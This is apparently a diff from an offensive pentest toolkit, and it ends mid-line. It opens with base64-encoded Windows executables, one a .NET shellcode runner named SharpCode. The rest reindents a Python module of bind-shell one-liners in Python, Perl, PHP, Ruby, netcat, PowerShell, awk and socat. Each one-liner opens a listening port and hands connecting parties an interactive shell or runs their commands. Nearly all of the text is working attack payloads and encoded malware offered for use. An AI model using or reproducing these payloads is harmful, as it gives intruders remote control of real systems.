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""" +WINDOWS_SHARPCODE = """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UQMQAEEAUQMQAEkAUQMQAFEAUQMQAFkAUQMQAGEAUQMVAGkAUQMQAHEAUQMQAHkAUQMQAIkAUQMaAJEAUQMGAKkAuAAlAJkAUQMGALEAvAI5ALkAUQMQALEAcwQ9AKEAUQMBAMEAswJCAMkACgBGAKEAcABMAJkAswJCANkAiQRfAOkAUwRxAPEAjgR2AOkAJgN/ACcAgwBEAi4ACwBnAS4AEwBwAS4AGwCPAS4AIwCYAS4AKwCnAS4AMwCnAS4AOwCnAS4AQwCYAS4ASwCtAS4AUwCnAS4AWwCnAS4AYwDFAS4AawDvAS4AcwD8AQgABgCLACAAKgBSAGoAAQAAAQ0ASwABAAABDwBjAAEAAAERAJUAAQAAARMANQQBAASAAAABAAAAAAAAAAAAAAAAAHcAAAAEAAAAAAAAAAAAAACCAD0AAAAAAAAAAAAAa2VybmVsMzIAVG9JbnQzMgA8TW9kdWxlPgBQQUdFX0VYRUNVVEVfUkVBRFdSSVRFAE1FTV9DT01NSVQAbXNjb3JsaWIARXhlYwBWaXJ0dWFsQWxsb2MAbHBUaHJlYWRJZABDcmVhdGVUaHJlYWQAQXBwZW5kAFNoYXJwQ29kZQBTaGVsbGNvZGUAc2hlbGxjb2RlAENsb3NlSGFuZGxlAGhIYW5kbGUAaGFuZGxlAENvbnNvbGUAV3JpdGVMaW5lAGZsQWxsb2NhdGlvblR5cGUAR3VpZEF0dHJpYnV0ZQBVbnZlcmlmaWFibGVDb2RlQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAFNlY3VyaXR5UGVybWlzc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAQnl0ZQBTaGFycENvZGUuZXhlAGR3U3RhY2tTaXplAHNpemUAYXJnYnVmAFN5c3RlbS5SdW50aW1lLlZlcnNpb25pbmcAVG9TdHJpbmcAZ2V0X0xlbmd0aABNYXJzaGFsAHBhcmFtAFByb2dyYW0AU3lzdGVtAE1haW4AU2VjdXJpdHlBY3Rpb24AU3lzdGVtLlJlZmxlY3Rpb24AQXJndW1lbnRPdXRPZlJhbmdlRXhjZXB0aW9uAFplcm8AQ2hhcgBscFN0YXJ0QWRkcgBTdHJpbmdCdWlsZGVyAEJ1ZmZlcgAuY3RvcgAuY2N0b3IASW50UHRyAHN0cgBTeXN0ZW0uRGlhZ25vc3RpY3MAZHdNaWxsaXNlY29uZHMAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMARGVidWdnaW5nTW9kZXMAbHBUaHJlYWRBdHRyaWJ1dGVzAEdldEJ5dGVzAGR3Q3JlYXRpb25GbGFncwBhcmdzAFN5c3RlbS5TZWN1cml0eS5QZXJtaXNzaW9ucwBscFN0YXJ0QWRkcmVzcwBXYWl0Rm9yU2luZ2xlT2JqZWN0AGZsUHJvdGVjdABvcF9FeHBsaWNpdABDb252ZXJ0AFN5c3RlbS5UZXh0AFRvQ2hhckFycmF5AFVuaGV4bGlmeQBCbG9ja0NvcHkAU3lzdGVtLlNlY3VyaXR5AAAAK04AbwB0ACAAZQBuAG8AdQBnAGgAIABhAHIAZwB1AG0AZQBuAHQAcwAuAAAjTwBkAGQALQBsAGUAbgBnAHQAaAAgAHMAdAByAGkAbgBnAAE3TgBvAG4ALQBoAGUAeABhAGQAZQBjAGkAbQBhAGwAIABkAGkAZwBpAHQAIABmAG8AdQBuAGQAAQAAAMJsMyb6AcNNlYorob3O05AABCABAQgDIAABBSABARERBCABAQ4EIAEBAgUgAQERQQQHAgIIBAABAQ4OBwoIHQMSUQIICAgCAg4DIAAIBCAAHQMDIAAOBQACCA4IBSABElEDDAcHHQUdBQgIAgIdBQoABQEScQgScQgIBgcECRgJGAQAARgKCAAEAR0F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""" \ No newline at end of file diff --git a/src/bind.py b/src/bind.py index a4c8d76..344d73a 100644 --- a/src/bind.py +++ b/src/bind.py @@ -3,47 +3,152 @@ # Bind TCP shells def BIND_PYTHON_TCP(): - return """python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind(('',PORT));s.listen(1);conn,addr=s.accept();os.dup2(conn.fileno(),0);os.dup2(conn.fileno(),1);os.dup2(conn.fileno(),2);p=subprocess.call(['/bin/bash','-i'])" """ + return """python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind(('',PORT));s.listen(1);conn,addr=s.accept();os.dup2(conn.fileno(),0);os.dup2(conn.fileno(),1);os.dup2(conn.fileno(),2);p=subprocess.call(['/bin/bash','-i'])" """ + def BIND_PYTHON_UDP(): - return """python -c 'while 1: from subprocess import Popen,PIPE;from socket import socket, AF_INET, SOCK_DGRAM;s=socket(AF_INET,SOCK_DGRAM);s.bind(("0.0.0.0",PORT));data,addr=s.recvfrom(8096);out=Popen(data,shell=True,stdout=PIPE,stderr=PIPE).communicate();s.sendto("".join([out[0],out[1]]),addr)'""" + return """python -c 'while 1: from subprocess import Popen,PIPE;from socket import socket, AF_INET, SOCK_DGRAM;s=socket(AF_INET,SOCK_DGRAM);s.bind(("0.0.0.0",PORT));data,addr=s.recvfrom(8096);out=Popen(data,shell=True,stdout=PIPE,stderr=PIPE).communicate();s.sendto("".join([out[0],out[1]]),addr)'""" + def BIND_PERL_TCP(): - return """perl -e 'use Socket;$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/bash -i");};'""" + return """perl -e 'use Socket;$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/bash -i");};'""" + def BIND_PERL_UDP(): - return """perl -e 'use IO::Socket::INET;$|=1;my ($s,$r);my ($pa,$pp);$s=new IO::Socket::INET->new();$s = new IO::Socket::INET(LocalPort => "PORT",Proto => "udp");while(1) { $s->recv($r,1024);$pa=$s->peerhost();$pp=$s->peerport();$d=qx($r);$s->send($d);}'""" + return """perl -e 'use IO::Socket::INET;$|=1;my ($s,$r);my ($pa,$pp);$s=new IO::Socket::INET->new();$s = new IO::Socket::INET(LocalPort => "PORT",Proto => "udp");while(1) { $s->recv($r,1024);$pa=$s->peerhost();$pp=$s->peerport();$d=qx($r);$s->send($d);}'""" + def BIND_PHP_TCP(): - return """php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,"0.0.0.0",PORT);socket_listen($s,1);$cl=socket_accept($s);while(1){if(!socket_write($cl,"$ ",2))exit;$in=socket_read($cl,100);$cmd=popen("$in","r");while(!feof($cmd)){$m=fgetc($cmd);socket_write($cl,$m,strlen($m));}}'""" + return """php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,"0.0.0.0",PORT);socket_listen($s,1);$cl=socket_accept($s);while(1){if(!socket_write($cl,"$ ",2))exit;$in=socket_read($cl,100);$cmd=popen("$in","r");while(!feof($cmd)){$m=fgetc($cmd);socket_write($cl,$m,strlen($m));}}'""" + def BIND_PHP_UDP(): - return """php -r '$s=socket_create(AF_INET, SOCK_DGRAM, 0);socket_bind($s,"0.0.0.0",PORT);while(1){ socket_recvfrom($s, $buf, 1024, 0, $remote_ip, $remote_port);$d=shell_exec($buf);socket_sendto($s,$d,1024,0,$remote_ip,$remote_port);}'""" + return """php -r '$s=socket_create(AF_INET, SOCK_DGRAM, 0);socket_bind($s,"0.0.0.0",PORT);while(1){ socket_recvfrom($s, $buf, 1024, 0, $remote_ip, $remote_port);$d=shell_exec($buf);socket_sendto($s,$d,1024,0,$remote_ip,$remote_port);}'""" + def BIND_RUBY_TCP(): - return """ruby -rsocket -e 'f=TCPServer.new(PORT);s=f.accept;exec sprintf("/bin/bash -i <&%d >&%d 2>&%d",s,s,s)'""" + return """ruby -rsocket -e 'f=TCPServer.new(PORT);s=f.accept;exec sprintf("/bin/bash -i <&%d >&%d 2>&%d",s,s,s)'""" + def BIND_RUBY_UDP(): - return """ruby -rsocket -e 'require "open3";s=UDPSocket.new;s.bind("0.0.0.0",PORT);loop do d,a=s.recvfrom(1024);out,err,st=Open3.capture3(d);s.send(out,0,a[3],a[1]); end'""" + return """ruby -rsocket -e 'require "open3";s=UDPSocket.new;s.bind("0.0.0.0",PORT);loop do d,a=s.recvfrom(1024);out,err,st=Open3.capture3(d);s.send(out,0,a[3],a[1]); end'""" + def BIND_NETCAT_TCP(): - return """rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -lvp PORT >/tmp/f""" + return """rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -lvp PORT >/tmp/f""" + def BIND_NETCAT_TRADITIONAL_TCP(): - return """nc -lvp PORT -c /bin/bash""" + return """nc -lvp PORT -c /bin/bash""" + def BIND_NETCAT_OPENBSD_UDP(): - return """coproc nc -luvp PORT; exec /bin/bash <&0${COPROC[0]} >&${COPROC[1]} 2>&1""" + return """coproc nc -luvp PORT; exec /bin/bash <&0${COPROC[0]} >&${COPROC[1]} 2>&1""" + def BIND_POWERSHELL_TCP(): - return """powershell.exe -nop -ep bypass -Command '$port=PORT;$listener=[System.Net.Sockets.TcpListener]$port;$listener.Start();$client = $listener.AcceptTCPClient();$stream=$client.GetStream();[byte[]]$bytes = 0..65535|%{0};$sendbytes = ([text.encoding]::ASCII).GetBytes(\\"Windows PowerShell running as user \\" + $env:username + \\" on \\" + $env:computername + \\"`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n\\");$stream.Write($sendbytes,0,$sendbytes.Length);$sendbytes = ([text.encoding]::ASCII).GetBytes(\\"PS \\" + (Get-Location).Path + \\"> \\");$stream.Write($sendbytes,0,$sendbytes.Length);while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $returndata = ([text.encoding]::ASCII).GetString($bytes, 0, $i); try { $result = (Invoke-Expression -command $returndata 2>&1 | Out-String ) } catch { Write-Warning \\"Something went wrong with execution of command on the target.\\"; Write-Error $_; }; $sendback = $result + \\"PS \\" + (Get-Location).Path + \\"> \\"; $x = ($error[0] | Out-String); $error.clear(); $sendback = $sendback + $x; $sendbytes = ([text.encoding]::ASCII).GetBytes($sendback); $stream.Write($sendbytes, 0, $sendbytes.Length); $stream.Flush();}; $client.Close(); if ($listener) { $listener.Stop(); };'""" + return """powershell.exe -nop -ep bypass -Command '$port=PORT;$listener=[System.Net.Sockets.TcpListener]$port;$listener.Start();$client = $listener.AcceptTCPClient();$stream=$client.GetStream();[byte[]]$bytes = 0..65535|%{0};$sendbytes = ([text.encoding]::ASCII).GetBytes(\\"Windows PowerShell running as user \\" + $env:username + \\" on \\" + $env:computername + \\"`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n\\");$stream.Write($sendbytes,0,$sendbytes.Length);$sendbytes = ([text.encoding]::ASCII).GetBytes(\\"PS \\" + (Get-Location).Path + \\"> \\");$stream.Write($sendbytes,0,$sendbytes.Length);while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $returndata = ([text.encoding]::ASCII).GetString($bytes, 0, $i); try { $result = (Invoke-Expression -command $returndata 2>&1 | Out-String ) } catch { Write-Warning \\"Something went wrong with execution of command on the target.\\"; Write-Error $_; }; $sendback = $result + \\"PS \\" + (Get-Location).Path + \\"> \\"; $x = ($error[0] | Out-String); $error.clear(); $sendback = $sendback + $x; $sendbytes = ([text.encoding]::ASCII).GetBytes($sendback); $stream.Write($sendbytes, 0, $sendbytes.Length); $stream.Flush();}; $client.Close(); if ($listener) { $listener.Stop(); };'""" + # Removed from MetasploitFramework # https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/singles/cmd/unix/bind_awk.rb def BIND_AWK_TCP(): - return "awk 'BEGIN{s=\"/inet/tcp/PORT/0/0\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'" + return "awk 'BEGIN{s=\"/inet/tcp/PORT/0/0\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'" + # Removed from MetasploitFramework # https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/singles/cmd/unix/bind_socat_udp.rb def BIND_SOCAT_UDP(): - return "socat udp-listen:PORT exec:'bash -li',pty,stderr,sane 2>&1>/dev/null &" + return "socat 